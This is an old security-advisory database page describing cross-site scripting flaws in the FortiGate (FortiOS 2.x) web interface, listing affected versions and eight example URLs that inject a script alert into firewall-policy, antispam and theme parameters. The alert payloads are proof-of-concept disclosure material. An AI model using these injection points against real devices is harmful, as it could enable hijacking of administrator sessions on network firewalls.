exploits , vulnerabilities , articles , FortiGate Firewall Web Interface Cross-Site Scripting Vulnerabilities

Title	FortiGate Firewall Web Interface Cross-Site Scripting Vulnerabilities
Published	2003-11-12-12:00AM
Updated	2003-11-12-11:14PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery is credited to "Maarten Hartsuijker" <maartenh@phreaker.net>.
Vulnerable	Fortinet FortiOS 2.36 Fortinet FortiOS 2.5 0MR4 Fortinet FortiOS 2.5
Not Vulnerable	Fortinet FortiOS 2.50 MR5
Code	The following examples were provided: https://www.example.com/firewall/policy/dlg?q=-1&fzone=t<script>alert('oops')</script>>&tzone=dmz https://www.example.com/firewall/policy/policy?fzone=internal&tzone=dmz1<script>alert('oops')</script> https://www.example.com/antispam/listdel?file=blacklist&name=b<script>alert('oops')</script>&startline=0 https://www.example.com/antispam/listdel?file=whitelist&name=a<script>alert('oops')</script>&startline=0(naturally) http://www.example.com/theme1/selector?button=status,monitor,session"><script>alert('oops')</script>&button_url=/system/status/status,/system/status/moniter,/system/status/session http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status"><script>alert('oops')</script>,/system/status/moniter,/system/status/session http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter"><script>alert('oops')</script>,/system/status/session http://www.example.com/theme1/selector?button=status,monitor,session&button_url=/system/status/status,/system/status/moniter,/system/status/session"><script>alert('oops')</script>
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-17 Mozilla Firefox CVE-2009-3979 Multiple Remote Memory Corruption Vulnerabilities
• 2009-12-17 Mozilla Firefox CVE-2009-3981 Remote Memory Corruption Vulnerability
• 2009-12-17 Drupal Sections Module HTML Injection Vulnerability
• 2009-12-17 Mozilla Firefox and SeaMonkey Theora Video Library Remote Integer Overflow Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Insecure Protocol Location Bar Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox and Sea Monkey Content Injection Spoofing Vulnerability
• 2009-12-17 Mozilla Firefox/SeaMonkey GeckoActiveXObject Exception Message COM Object Enumeration Vulnerability
• 2009-12-16 ZABBIX Denial Of Service and SQL Injection Vulnerabilities
• 2009-12-16 IBM WebSphere Application Server JNDI Remote Information Disclosure Vulnerability
• 2009-12-16 Horde Application Framework Administration Interface Cross-Site Scripting Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Thu, 17 Dec 2009 14:17:18 +0000